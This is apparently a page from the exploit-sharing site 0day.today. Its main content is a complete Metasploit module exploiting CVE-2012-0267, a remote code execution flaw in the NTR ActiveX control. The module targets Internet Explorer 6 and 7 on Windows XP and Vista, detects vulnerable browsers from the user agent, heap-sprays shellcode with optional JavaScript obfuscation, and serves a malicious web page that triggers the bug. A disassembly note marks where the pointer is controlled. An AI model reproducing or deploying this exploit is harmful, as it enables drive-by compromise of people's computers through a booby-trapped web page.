0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NTR ActiveX Control StopModule() Remote Code Execution
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "7.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :classid => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}", :method => "StopModule", :rank => NormalRanking }) def initialize(info = {}) super(update_info(info, 'Name' => 'NTR ActiveX Control StopModule() Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The vulnerability exists in the StopModule() method, where the lModule parameter is used to dereference memory to get a function pointer, which leads to code execution under the context of the user visiting a malicious web page. }, 'Author' => [ 'Carsten Eiram', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-0267' ], [ 'OSVDB', '78253' ], [ 'BID', '51374' ], [ 'URL', 'http://secunia.com/secunia_research/2012-2/' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "" }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # NTR ActiveX 1.1.8.0 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4'} ] ], 'Privileged' => false, 'DisclosureDate' => 'Jan 11 2012', 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class ) end def get_spray(t, js_code, js_nops) spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{t['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < 500; z++) { heap_obj.alloc(block); } JS return spray end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[3] #IE 7 on Windows Vista SP2 else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] print_status("User-agent: #{agent}") my_target = get_target(agent) # Avoid the attack if the victim doesn't have a setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent}") send_not_found(cli) return end p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js = get_spray(my_target, js_code, js_nops) js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end address = 0x0c0c0c0c / 0x134 html = <<-MYHTML <html> <body> <object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object> <script> #{js} test.StopModule(#{address}); </script> </body> </html> MYHTML html = html.gsub(/^\t\t/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin The pointer is "controlled" here: .text:10004449 mov eax, [ebp+arg_0] ; arg_0 is user controlled .text:1000444C imul eax, 134h ; it looks good .text:10004452 lea esi, [eax+edi] ; eax is user controlled .text:10004452 ; edi is a heap pointer initialized while activex loading .text:10004452 ; (Important note: the default heap isn't being used) .text:10004452 ; .text:10004452 ; edi: .text:10004452 ; .text:10004452 ; 0:000> !heap -p -a edi .text:10004452 ; address 01fb370c found in .text:10004452 ; _HEAP @ 1fb0000 .text:10004452 ; HEAP_ENTRY Size Prev Flags UserPtr UserSize - state .text:10004452 ; 01fb3668 0373 0000 [01] 01fb3670 01b90 - (busy) .text:10004452 ; ? ntractivex118!DllUnregisterServer+10d18 .text:10004452 ; .text:10004452 ; Initialization (while activex loading): .text:10004452 ; ChildEBP RetAddr Args to Child .text:10004452 ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac .text:10004452 ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823 .text:10004452 ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a .text:10004452 ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114 And user to get RCE here: .text:1000446E mov eax, [esi+24h] ; esi can be user influenced .text:10004471 test eax, eax .text:10004473 jz short loc_10004477 .text:10004475 call eax ; RCE! =end # 0day.today [2024-12-25] #